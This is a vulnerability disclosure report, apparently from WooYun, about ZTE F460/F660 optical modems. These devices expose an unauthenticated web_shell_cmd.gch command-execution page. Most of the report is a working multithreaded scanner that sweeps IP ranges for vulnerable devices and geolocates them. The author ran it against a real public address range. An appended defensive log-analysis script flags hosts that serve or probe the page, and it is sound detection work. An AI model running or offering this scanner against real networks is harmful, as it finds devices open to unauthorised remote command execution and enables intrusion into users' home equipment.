WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
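2015-08-15: Details reported to the vendor; awaiting vendor handling
2015-08-15: Vendor confirmed; details disclosed to the vendor only
2015-08-25: Details disclosed to core white hats and experts in related fields
2015-09-04: Details disclosed to regular white hats
2015-09-14: Details disclosed to intern white hats
2015-09-29: Details disclosed to the public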
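Unauthorized access leading to command execution
I previously saw that several ZTE optical modems allow arbitrary command execution through unauthorized access. None of those cases covered the F460 and F660, so I wrote a script to scan for these two models. The number is not small, and all of them can be reached directly on remote port 80.
First, look at the interfaces of the two devices. They look almost identical; only the version numbers differ.
As the screenshots make clear, appending web_shell_cmd.gch to the IP address leads straight to the command execution page, which matches the vulnerability in the other optical modem models reported earlier. I scanned the range 27.151.1.1-27.160.1.1 and did not scan other ranges; see the scan results.
The code of the scanning script is given below: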
#!/usr/bin/env python
# coding=utf-8
# code by 92ez.com
# last modify time 2015-05-19 08:50

import Queue
from threading import Thread
import time
import re
import sys
import subprocess
import json
import urllib2

#ip to num
def ip2num(ip):
    ip = [int(x) for x in ip.split('.')]
    return ip[0] << 24 | ip[1] << 16 | ip[2] << 8 | ip[3]

#num to ip
def num2ip(num):
    return '%s.%s.%s.%s' % ((num & 0xff000000) >> 24, (num & 0x00ff0000) >> 16, (num & 0x0000ff00) >> 8, num & 0x000000ff)

#get all ips list between start ip and end ip
def ip_range(start, end):
    return [num2ip(num) for num in range(ip2num(start), ip2num(end) + 1) if num & 0xff]

#main function
def bThread(iplist):
    SETTHREAD = raw_input('Thread: ')
    print '[Note] Running...\n'
    threadl = []
    queue = Queue.Queue()
    hosts = iplist
    for host in hosts:
        queue.put(host)
    threadl = [tThread(queue) for x in xrange(0, int(SETTHREAD))]
    for t in threadl:
        t.start()
    for t in threadl:
        t.join()

#get host position by Taobao API
def getposition(host):
    try:
        ipurl = "http://ip.taobao.com/service/getIpInfo.php?ip="+host
        jsondata = urllib2.urlopen(ipurl).read()
        value = json.loads(jsondata)['data']
        info = [value['country'],value['region'],value['city'],value['isp'] ]
        return info
    except Exception, e:
        print "[Note] Get "+ host+" position failed , will retry ...\n"
        getposition(host)

#create thread
class tThread(Thread):
    def __init__(self, queue):
        Thread.__init__(self)
        self.queue = queue

    def run(self):
        global PORT
        while not self.queue.empty():
            host = self.queue.get()
            try:
                #print host
                checktitle(host,PORT)
            except:
                continue

def checktitle(host,port):
    aimurl = "http://"+host+":"+port+"/web_shell_cmd.gch"
    try:
        f = urllib2.urlopen(aimurl,timeout = 5)
        htmlcontent = f.read()
        f.close()
        if len(htmlcontent) == 4609:
            posinfo = getposition(host)
            title = re.findall(r'<title>(.+?)</title>',htmlcontent)
            print "Fount "+ title[0].encode('utf8') +" , url : "+ aimurl +" ,extra info :"+posinfo[0].encode('utf8')+" "+posinfo[1].encode('utf8')+" "+posinfo[2].encode('utf8')+" "+posinfo[3].encode('utf8')
    except Exception, e:
        pass

if __name__ == '__main__':
    print '\nScan ZTE Fxx0 fiber-optic modem program.\n'
    startIp = raw_input('Start IP: ')
    endIp = raw_input('End IP: ')
    port = raw_input('Port: ')
    global PORT
    PORT = port
    iplist = ip_range(startIp, endIp)
    print '\n[Note] Total '+str(len(iplist))+" IP...\n"
    bThread(iplist)
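Restrict access to authorized users
Severity: High
Vulnerability Rank: 13
Confirmed: 2015-08-15 06:42
Thank you for the submission; much appreciated
None yet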
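On the operator side, requests for the unauthenticated web_shell_cmd.gch page described in this report can be spotted in gateway or proxy logs. The following is an added example, not part of the original report: it flags devices that serve the page to sources outside a management network and sources that request it on several devices. The log field layout, the management subnet and the sample records are assumptions constructed for illustration.

```python
import ipaddress
from collections import defaultdict

# Constructed sample records, not real traffic. Assumed field layout:
# time, source IP, destination IP, method, path, HTTP status, response size
SAMPLE_LOG = """\
2015-08-15T06:01:02 203.0.113.7 198.51.100.10 GET /web_shell_cmd.gch 200 4609
2015-08-15T06:01:02 203.0.113.7 198.51.100.11 GET /web_shell_cmd.gch 404 312
2015-08-15T06:01:03 203.0.113.7 198.51.100.12 GET /web_shell_cmd.gch 200 4609
2015-08-15T06:05:40 192.168.1.20 198.51.100.10 GET /index.html 200 1820
2015-08-15T06:07:11 192.168.1.20 198.51.100.12 POST /web_shell_cmd.gch 200 4700
garbled line
"""

CMD_PAGE = "/web_shell_cmd.gch"  # command page named in the report
MGMT_NETS = [ipaddress.ip_network("192.168.1.0/24")]  # assumed management LAN


def is_trusted(src):
    """True when the source address lies inside an assumed management network."""
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in MGMT_NETS)


def analyse(log_text, scan_threshold=3):
    """Return (exposed_devices, scanning_sources) as two sorted lists."""
    exposed = set()
    targets_by_src = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 7:
            continue  # skip malformed records
        _, src, dst, _method, path, status, _size = parts
        if path.split("?", 1)[0].lower() != CMD_PAGE:
            continue
        try:
            if is_trusted(src):
                continue  # expected administration traffic
        except ValueError:
            continue  # source field is not an IP address
        targets_by_src[src].add(dst)
        if status == "200":
            exposed.add(dst)  # page served to an untrusted source
    scanners = {s for s, d in targets_by_src.items() if len(d) >= scan_threshold}
    return sorted(exposed), sorted(scanners)


if __name__ == "__main__":
    devices, sources = analyse(SAMPLE_LOG)
    print("devices serving the command page to untrusted sources:", devices)
    print("sources probing it on several devices:", sources)
```

Devices in the first list are the ones where access to the page still needs to be restricted; the second list is a candidate block list for the upstream filter.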